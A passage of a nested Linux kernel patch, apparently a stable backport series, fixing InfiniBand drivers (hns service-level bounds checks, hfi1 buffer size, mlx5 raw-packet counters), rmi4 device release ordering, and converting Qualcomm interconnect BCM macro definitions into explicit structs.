++				       size_add(size_sub(e, s), 1)),
++			   GFP_KERNEL);
+ 	if (!umad_dev)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/infiniband/hw/hfi1/efivar.c b/drivers/infiniband/hw/hfi1/efivar.c
+index 7741a1d69097c..2b5d264f41e51 100644
+--- a/drivers/infiniband/hw/hfi1/efivar.c
++++ b/drivers/infiniband/hw/hfi1/efivar.c
+@@ -112,7 +112,7 @@ int read_hfi1_efi_var(struct hfi1_devdata *dd, const char *kind,
+ 		      unsigned long *size, void **return_data)
+ {
+ 	char prefix_name[64];
+-	char name[64];
++	char name[128];
+ 	int result;
+ 
+ 	/* create a common prefix */
+diff --git a/drivers/infiniband/hw/hns/hns_roce_ah.c b/drivers/infiniband/hw/hns/hns_roce_ah.c
+index 480c062dd04f1..103a7787b3712 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_ah.c
++++ b/drivers/infiniband/hw/hns/hns_roce_ah.c
+@@ -33,7 +33,9 @@
+ #include <linux/pci.h>
+ #include <rdma/ib_addr.h>
+ #include <rdma/ib_cache.h>
++#include "hnae3.h"
+ #include "hns_roce_device.h"
++#include "hns_roce_hw_v2.h"
+ 
+ static inline u16 get_ah_udp_sport(const struct rdma_ah_attr *ah_attr)
+ {
+@@ -58,6 +60,7 @@ int hns_roce_create_ah(struct ib_ah *ibah, struct rdma_ah_init_attr *init_attr,
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibah->device);
+ 	struct hns_roce_ah *ah = to_hr_ah(ibah);
+ 	int ret = 0;
++	u32 max_sl;
+ 
+ 	if (hr_dev->pci_dev->revision == PCI_REVISION_ID_HIP08 && udata)
+ 		return -EOPNOTSUPP;
+@@ -71,9 +74,17 @@ int hns_roce_create_ah(struct ib_ah *ibah, struct rdma_ah_init_attr *init_attr,
+ 	ah->av.hop_limit = grh->hop_limit;
+ 	ah->av.flowlabel = grh->flow_label;
+ 	ah->av.udp_sport = get_ah_udp_sport(ah_attr);
+-	ah->av.sl = rdma_ah_get_sl(ah_attr);
+ 	ah->av.tclass = get_tclass(grh);
+ 
++	ah->av.sl = rdma_ah_get_sl(ah_attr);
++	max_sl = min_t(u32, MAX_SERVICE_LEVEL, hr_dev->caps.sl_num - 1);
++	if (unlikely(ah->av.sl > max_sl)) {
++		ibdev_err_ratelimited(&hr_dev->ib_dev,
++				      "failed to set sl, sl (%u) shouldn't be larger than %u.\n",
++				      ah->av.sl, max_sl);
++		return -EINVAL;
++	}
++
+ 	memcpy(ah->av.dgid, grh->dgid.raw, HNS_ROCE_GID_SIZE);
+ 	memcpy(ah->av.mac, ah_attr->roce.dmac, ETH_ALEN);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 33980485ef5ba..8a9d28f81149a 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -270,7 +270,7 @@ static bool check_inl_data_len(struct hns_roce_qp *qp, unsigned int len)
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(qp->ibqp.device);
+ 	int mtu = ib_mtu_enum_to_int(qp->path_mtu);
+ 
+-	if (len > qp->max_inline_data || len > mtu) {
++	if (mtu < 0 || len > qp->max_inline_data || len > mtu) {
+ 		ibdev_err(&hr_dev->ib_dev,
+ 			  "invalid length of data, data len = %u, max inline len = %u, path mtu = %d.\n",
+ 			  len, qp->max_inline_data, mtu);
+@@ -4883,6 +4883,9 @@ static int check_cong_type(struct ib_qp *ibqp,
+ {
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibqp->device);
+ 
++	if (ibqp->qp_type == IB_QPT_UD)
++		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++
+ 	/* different congestion types match different configurations */
+ 	switch (hr_dev->caps.cong_type) {
+ 	case CONG_TYPE_DCQCN:
+@@ -4979,22 +4982,32 @@ static int hns_roce_v2_set_path(struct ib_qp *ibqp,
+ 	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
+ 	const struct ib_gid_attr *gid_attr = NULL;
++	u8 sl = rdma_ah_get_sl(&attr->ah_attr);
+ 	int is_roce_protocol;
+ 	u16 vlan_id = 0xffff;
+ 	bool is_udp = false;
++	u32 max_sl;
+ 	u8 ib_port;
+ 	u8 hr_port;
+ 	int ret;
+ 
++	max_sl = min_t(u32, MAX_SERVICE_LEVEL, hr_dev->caps.sl_num - 1);
++	if (unlikely(sl > max_sl)) {
++		ibdev_err_ratelimited(ibdev,
++				      "failed to fill QPC, sl (%u) shouldn't be larger than %u.\n",
++				      sl, max_sl);
++		return -EINVAL;
++	}
++
+ 	/*
+ 	 * If free_mr_en of qp is set, it means that this qp comes from
+ 	 * free mr. This qp will perform the loopback operation.
+ 	 * In the loopback scenario, only sl needs to be set.
+ 	 */
+ 	if (hr_qp->free_mr_en) {
+-		hr_reg_write(context, QPC_SL, rdma_ah_get_sl(&attr->ah_attr));
++		hr_reg_write(context, QPC_SL, sl);
+ 		hr_reg_clear(qpc_mask, QPC_SL);
+-		hr_qp->sl = rdma_ah_get_sl(&attr->ah_attr);
++		hr_qp->sl = sl;
+ 		return 0;
+ 	}
+ 
+@@ -5061,14 +5074,7 @@ static int hns_roce_v2_set_path(struct ib_qp *ibqp,
+ 	memcpy(context->dgid, grh->dgid.raw, sizeof(grh->dgid.raw));
+ 	memset(qpc_mask->dgid, 0, sizeof(grh->dgid.raw));
+ 
+-	hr_qp->sl = rdma_ah_get_sl(&attr->ah_attr);
+-	if (unlikely(hr_qp->sl > MAX_SERVICE_LEVEL)) {
+-		ibdev_err(ibdev,
+-			  "failed to fill QPC, sl (%u) shouldn't be larger than %d.\n",
+-			  hr_qp->sl, MAX_SERVICE_LEVEL);
+-		return -EINVAL;
+-	}
+-
++	hr_qp->sl = sl;
+ 	hr_reg_write(context, QPC_SL, hr_qp->sl);
+ 	hr_reg_clear(qpc_mask, QPC_SL);
+ 
+@@ -5961,7 +5967,7 @@ static void hns_roce_irq_work_handle(struct work_struct *work)
+ 	case HNS_ROCE_EVENT_TYPE_COMM_EST:
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SQ_DRAINED:
+-		ibdev_warn(ibdev, "send queue drained.\n");
++		ibdev_dbg(ibdev, "send queue drained.\n");
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_WQ_CATAS_ERROR:
+ 		ibdev_err(ibdev, "local work queue 0x%x catast error, sub_event type is: %d\n",
+@@ -5976,10 +5982,10 @@ static void hns_roce_irq_work_handle(struct work_struct *work)
+ 			  irq_work->queue_num, irq_work->sub_type);
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SRQ_LIMIT_REACH:
+-		ibdev_warn(ibdev, "SRQ limit reach.\n");
++		ibdev_dbg(ibdev, "SRQ limit reach.\n");
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SRQ_LAST_WQE_REACH:
+-		ibdev_warn(ibdev, "SRQ last wqe reach.\n");
++		ibdev_dbg(ibdev, "SRQ last wqe reach.\n");
+ 		break;
+ 	case HNS_ROCE_EVENT_TYPE_SRQ_CATAS_ERROR:
+ 		ibdev_err(ibdev, "SRQ catas error.\n");
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index 7a95f8677a02c..7b79e6b3f3baa 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -1128,7 +1128,7 @@ static int hns_roce_create_qp_common(struct hns_roce_dev *hr_dev,
+ {
+ 	struct hns_roce_ib_create_qp_resp resp = {};
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
+-	struct hns_roce_ib_create_qp ucmd;
++	struct hns_roce_ib_create_qp ucmd = {};
+ 	int ret;
+ 
+ 	mutex_init(&hr_qp->mutex);
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index 0baf3b5518b46..bce31e28eb303 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -4027,10 +4027,8 @@ static int mlx5_ib_stage_post_ib_reg_umr_init(struct mlx5_ib_dev *dev)
+ 		return ret;
+ 
+ 	ret = mlx5_mkey_cache_init(dev);
+-	if (ret) {
++	if (ret)
+ 		mlx5_ib_warn(dev, "mr cache init failed %d\n", ret);
+-		mlx5r_umr_resource_cleanup(dev);
+-	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index ac53ed79ca64c..e0df3017e241a 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -3960,6 +3960,30 @@ static unsigned int get_tx_affinity(struct ib_qp *qp,
+ 	return tx_affinity;
+ }
+ 
++static int __mlx5_ib_qp_set_raw_qp_counter(struct mlx5_ib_qp *qp, u32 set_id,
++					   struct mlx5_core_dev *mdev)
++{
++	struct mlx5_ib_raw_packet_qp *raw_packet_qp = &qp->raw_packet_qp;
++	struct mlx5_ib_rq *rq = &raw_packet_qp->rq;
++	u32 in[MLX5_ST_SZ_DW(modify_rq_in)] = {};
++	void *rqc;
++
++	if (!qp->rq.wqe_cnt)
++		return 0;
++
++	MLX5_SET(modify_rq_in, in, rq_state, rq->state);
++	MLX5_SET(modify_rq_in, in, uid, to_mpd(qp->ibqp.pd)->uid);
++
++	rqc = MLX5_ADDR_OF(modify_rq_in, in, ctx);
++	MLX5_SET(rqc, rqc, state, MLX5_RQC_STATE_RDY);
++
++	MLX5_SET64(modify_rq_in, in, modify_bitmask,
++		   MLX5_MODIFY_RQ_IN_MODIFY_BITMASK_RQ_COUNTER_SET_ID);
++	MLX5_SET(rqc, rqc, counter_set_id, set_id);
++
++	return mlx5_core_modify_rq(mdev, rq->base.mqp.qpn, in);
++}
++
+ static int __mlx5_ib_qp_set_counter(struct ib_qp *qp,
+ 				    struct rdma_counter *counter)
+ {
+@@ -3975,6 +3999,9 @@ static int __mlx5_ib_qp_set_counter(struct ib_qp *qp,
+ 	else
+ 		set_id = mlx5_ib_get_counters_id(dev, mqp->port - 1);
+ 
++	if (mqp->type == IB_QPT_RAW_PACKET)
++		return __mlx5_ib_qp_set_raw_qp_counter(mqp, set_id, dev->mdev);
++
+ 	base = &mqp->trans_qp.base;
+ 	MLX5_SET(rts2rts_qp_in, in, opcode, MLX5_CMD_OP_RTS2RTS_QP);
+ 	MLX5_SET(rts2rts_qp_in, in, qpn, base->mqp.qpn);
+diff --git a/drivers/input/rmi4/rmi_bus.c b/drivers/input/rmi4/rmi_bus.c
+index 50a0134b6901b..e6557d5f50ce5 100644
+--- a/drivers/input/rmi4/rmi_bus.c
++++ b/drivers/input/rmi4/rmi_bus.c
+@@ -277,11 +277,11 @@ void rmi_unregister_function(struct rmi_function *fn)
+ 
+ 	device_del(&fn->dev);
+ 	of_node_put(fn->dev.of_node);
+-	put_device(&fn->dev);
+ 
+ 	for (i = 0; i < fn->num_of_irqs; i++)
+ 		irq_dispose_mapping(fn->irq[i]);
+ 
++	put_device(&fn->dev);
+ }
+ 
+ /**
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index e4b2d9ef61b4d..0c6fc954e7296 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -1100,15 +1100,17 @@ void icc_provider_del(struct icc_provider *provider)
+ }
+ EXPORT_SYMBOL_GPL(icc_provider_del);
+ 
++static const struct of_device_id __maybe_unused ignore_list[] = {
++	{ .compatible = "qcom,sc7180-ipa-virt" },
++	{ .compatible = "qcom,sdx55-ipa-virt" },
++	{ .compatible = "qcom,sm8150-ipa-virt" },
++	{}
++};
++
+ static int of_count_icc_providers(struct device_node *np)
+ {
+ 	struct device_node *child;
+ 	int count = 0;
+-	const struct of_device_id __maybe_unused ignore_list[] = {
+-		{ .compatible = "qcom,sc7180-ipa-virt" },
+-		{ .compatible = "qcom,sdx55-ipa-virt" },
+-		{}
+-	};
+ 
+ 	for_each_available_child_of_node(np, child) {
+ 		if (of_property_read_bool(child, "#interconnect-cells") &&
+diff --git a/drivers/interconnect/qcom/sc7180.c b/drivers/interconnect/qcom/sc7180.c
+index 82d5e8a8c19ea..6d0450351a5a7 100644
+--- a/drivers/interconnect/qcom/sc7180.c
++++ b/drivers/interconnect/qcom/sc7180.c
+@@ -153,30 +153,238 @@ DEFINE_QNODE(srvc_snoc, SC7180_SLAVE_SERVICE_SNOC, 1, 4);
+ DEFINE_QNODE(xs_qdss_stm, SC7180_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SC7180_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_mm0, "MM0", false, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qnm_snoc, &xm_qdss_dap, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_ahb2phy0, &qhs_aop, &qhs_aoss, &qhs_boot_rom, &qhs_camera_cfg, &qhs_camera_nrt_throttle_cfg, &qhs_camera_rt_throttle_cfg, &qhs_clk_ctl, &qhs_cpr_cx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_dcc_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_display_rt_throttle_cfg, &qhs_display_throttle_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_mss_cfg, &qhs_npu_cfg, &qhs_npu_dma_throttle_cfg, &qhs_npu_dsp_throttle_cfg, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qm_cfg, &qhs_qm_mpu_cfg, &qhs_qup0, &qhs_qup1, &qhs_security, &qhs_snoc_cfg, &qhs_tcsr, &qhs_tlmm_1, &qhs_tlmm_2, &qhs_tlmm_3, &qhs_ufs_mem_cfg, &qhs_usb3, &qhs_venus_cfg, &qhs_venus_throttle_cfg, &qhs_vsense_ctrl_cfg, &srvc_cnoc);
+-DEFINE_QBCM(bcm_mm1, "MM1", false, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_hf1_uncomp, &qxm_camnoc_sf_uncomp, &qhm_mnoc_cfg, &qxm_mdp0, &qxm_rot, &qxm_venus0, &qxm_venus_arm9);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &acm_sys_tcu);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qns_mem_noc_sf);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qup_core_master_1, &qup_core_master_2);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &acm_apps0);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_cdsp_gemnoc);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_cn1, "CN1", false, &qhm_qspi, &xm_sdc2, &xm_emmc, &qhs_ahb2phy2, &qhs_emmc_cfg, &qhs_pdm, &qhs_qspi, &qhs_sdc2);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qxm_pimem, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_co2, "CO2", false, &qnm_npu);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_co3, "CO3", false, &qxm_npu_dsp);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn7, "SN7", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn9, "SN9", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn12, "SN12", false, &qnm_gemnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 48,
++	.nodes = { &qnm_snoc,
++		   &xm_qdss_dap,
++		   &qhs_a1_noc_cfg,
++		   &qhs_a2_noc_cfg,
++		   &qhs_ahb2phy0,
++		   &qhs_aop,
++		   &qhs_aoss,
++		   &qhs_boot_rom,
++		   &qhs_camera_cfg,
++		   &qhs_camera_nrt_throttle_cfg,
++		   &qhs_camera_rt_throttle_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_dcc_cfg,
++		   &qhs_ddrss_cfg,
++		   &qhs_display_cfg,
++		   &qhs_display_rt_throttle_cfg,
++		   &qhs_display_throttle_cfg,
++		   &qhs_glm,
++		   &qhs_gpuss_cfg,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_mnoc_cfg,
++		   &qhs_mss_cfg,
++		   &qhs_npu_cfg,
++		   &qhs_npu_dma_throttle_cfg,
++		   &qhs_npu_dsp_throttle_cfg,
++		   &qhs_pimem_cfg,
++		   &qhs_prng,
++		   &qhs_qdss_cfg,
++		   &qhs_qm_cfg,
++		   &qhs_qm_mpu_cfg,
++		   &qhs_qup0,
++		   &qhs_qup1,
++		   &qhs_security,
++		   &qhs_snoc_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm_1,
++		   &qhs_tlmm_2,
++		   &qhs_tlmm_3,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3,
++		   &qhs_venus_cfg,
++		   &qhs_venus_throttle_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 8,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_hf1_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qhm_mnoc_cfg,
++		   &qxm_mdp0,
++		   &qxm_rot,
++		   &qxm_venus0,
++		   &qxm_venus_arm9
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_mm2 = {
++	.name = "MM2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf },
++};
++
++static struct qcom_icc_bcm bcm_qup0 = {
++	.name = "QUP0",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qup_core_master_1, &qup_core_master_2 },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &acm_apps0 },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_cdsp_gemnoc },
++};
++
++static struct qcom_icc_bcm bcm_sn1 = {
++	.name = "SN1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_imem },
++};
++
++static struct qcom_icc_bcm bcm_cn1 = {
++	.name = "CN1",
++	.keepalive = false,
++	.num_nodes = 8,
++	.nodes = { &qhm_qspi,
++		   &xm_sdc2,
++		   &xm_emmc,
++		   &qhs_ahb2phy2,
++		   &qhs_emmc_cfg,
++		   &qhs_pdm,
++		   &qhs_qspi,
++		   &qhs_sdc2
++	},
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_pimem, &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_co2 = {
++	.name = "CO2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_npu },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_co3 = {
++	.name = "CO3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_npu_dsp },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn7 = {
++	.name = "SN7",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn9 = {
++	.name = "SN9",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn12 = {
++	.name = "SN12",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_gemnoc },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ 	&bcm_cn1,
+diff --git a/drivers/interconnect/qcom/sc7280.c b/drivers/interconnect/qcom/sc7280.c
+index 971f538bc98ad..3c39edd21b6ca 100644
+--- a/drivers/interconnect/qcom/sc7280.c
++++ b/drivers/interconnect/qcom/sc7280.c
+@@ -1284,6 +1284,7 @@ static struct qcom_icc_node srvc_snoc = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = BIT(3),
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi },
+ };
+diff --git a/drivers/interconnect/qcom/sc8180x.c b/drivers/interconnect/qcom/sc8180x.c
+index 8e32ca958824c..83461e31774ec 100644
+--- a/drivers/interconnect/qcom/sc8180x.c
++++ b/drivers/interconnect/qcom/sc8180x.c
+@@ -1360,6 +1360,7 @@ static struct qcom_icc_node slv_qup_core_2 = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = BIT(3),
+ 	.num_nodes = 1,
+ 	.nodes = { &slv_ebi }
+ };
+diff --git a/drivers/interconnect/qcom/sc8280xp.c b/drivers/interconnect/qcom/sc8280xp.c
+index 507fe5f89791a..489f259a02e5b 100644
+--- a/drivers/interconnect/qcom/sc8280xp.c
++++ b/drivers/interconnect/qcom/sc8280xp.c
+@@ -1727,6 +1727,7 @@ static struct qcom_icc_node srvc_snoc = {
+ 
+ static struct qcom_icc_bcm bcm_acv = {
+ 	.name = "ACV",
++	.enable_mask = BIT(3),
+ 	.num_nodes = 1,
+ 	.nodes = { &ebi },
+ };
+diff --git a/drivers/interconnect/qcom/sdm845.c b/drivers/interconnect/qcom/sdm845.c
+index 954e7bd13fc41..02cf890684441 100644
+--- a/drivers/interconnect/qcom/sdm845.c
++++ b/drivers/interconnect/qcom/sdm845.c
+@@ -146,34 +146,256 @@ DEFINE_QNODE(srvc_snoc, SDM845_SLAVE_SERVICE_SNOC, 1, 4);
+ DEFINE_QNODE(xs_qdss_stm, SDM845_SLAVE_QDSS_STM, 1, 4);
+ DEFINE_QNODE(xs_sys_tcu_cfg, SDM845_SLAVE_TCU, 1, 8);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_mm0, "MM0", false, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_sh1, "SH1", false, &qns_apps_io);
+-DEFINE_QBCM(bcm_mm1, "MM1", true, &qxm_camnoc_hf0_uncomp, &qxm_camnoc_hf1_uncomp, &qxm_camnoc_sf_uncomp, &qxm_camnoc_hf0, &qxm_camnoc_hf1, &qxm_mdp0, &qxm_mdp1);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &qns_memnoc_snoc);
+-DEFINE_QBCM(bcm_mm2, "MM2", false, &qns2_mem_noc);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &acm_tcu);
+-DEFINE_QBCM(bcm_mm3, "MM3", false, &qxm_camnoc_sf, &qxm_rot, &qxm_venus0, &qxm_venus1, &qxm_venus_arm9);
+-DEFINE_QBCM(bcm_sh5, "SH5", false, &qnm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_memnoc_sf);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", false, &qhm_spdm, &qhm_tic, &qnm_snoc, &xm_qdss_dap, &qhs_a1_noc_cfg, &qhs_a2_noc_cfg, &qhs_aop, &qhs_aoss, &qhs_camera_cfg, &qhs_clk_ctl, &qhs_compute_dsp_cfg, &qhs_cpr_cx, &qhs_crypto0_cfg, &qhs_dcc_cfg, &qhs_ddrss_cfg, &qhs_display_cfg, &qhs_glm, &qhs_gpuss_cfg, &qhs_imem_cfg, &qhs_ipa, &qhs_mnoc_cfg, &qhs_pcie0_cfg, &qhs_pcie_gen3_cfg, &qhs_pdm, &qhs_phy_refgen_south, &qhs_pimem_cfg, &qhs_prng, &qhs_qdss_cfg, &qhs_qupv3_north, &qhs_qupv3_south, &qhs_sdc2, &qhs_sdc4, &qhs_snoc_cfg, &qhs_spdm, &qhs_spss_cfg, &qhs_tcsr, &qhs_tlmm_north, &qhs_tlmm_south, &qhs_tsif, &qhs_ufs_card_cfg, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_usb3_1, &qhs_venus_cfg, &qhs_vsense_ctrl_cfg, &qns_cnoc_a2noc, &srvc_cnoc);
+-DEFINE_QBCM(bcm_qup0, "QUP0", false, &qhm_qup1, &qhm_qup2);
+-DEFINE_QBCM(bcm_sn1, "SN1", false, &qxs_imem);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_memnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qns_cnoc);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &qxm_pimem);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn6, "SN6", false, &qhs_apss, &srvc_snoc, &xs_sys_tcu_cfg);
+-DEFINE_QBCM(bcm_sn7, "SN7", false, &qxs_pcie);
+-DEFINE_QBCM(bcm_sn8, "SN8", false, &qxs_pcie_gen3);
+-DEFINE_QBCM(bcm_sn9, "SN9", false, &srvc_aggre1_noc, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn11, "SN11", false, &srvc_aggre2_noc, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn12, "SN12", false, &qnm_gladiator_sodv, &xm_gic);
+-DEFINE_QBCM(bcm_sn14, "SN14", false, &qnm_pcie_anoc);
+-DEFINE_QBCM(bcm_sn15, "SN15", false, &qnm_memnoc);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_sh1 = {
++	.name = "SH1",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_apps_io },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = true,
++	.num_nodes = 7,
++	.nodes = { &qxm_camnoc_hf0_uncomp,
++		   &qxm_camnoc_hf1_uncomp,
++		   &qxm_camnoc_sf_uncomp,
++		   &qxm_camnoc_hf0,
++		   &qxm_camnoc_hf1,
++		   &qxm_mdp0,
++		   &qxm_mdp1
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 1,
